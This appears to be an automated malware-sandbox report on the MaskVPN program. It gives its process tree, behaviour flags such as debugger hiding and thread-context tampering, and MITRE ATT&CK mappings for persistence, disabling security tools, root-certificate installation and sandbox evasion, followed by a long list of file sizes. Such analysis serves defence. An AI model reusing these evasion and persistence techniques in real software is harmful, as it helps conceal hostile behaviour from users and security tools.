C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6896 -ip 68961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
836KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
104KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
436KB
-
Filesize
4KB
-
Filesize
288KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
5.6MB
-
Filesize
728KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
192KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
108KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
4KB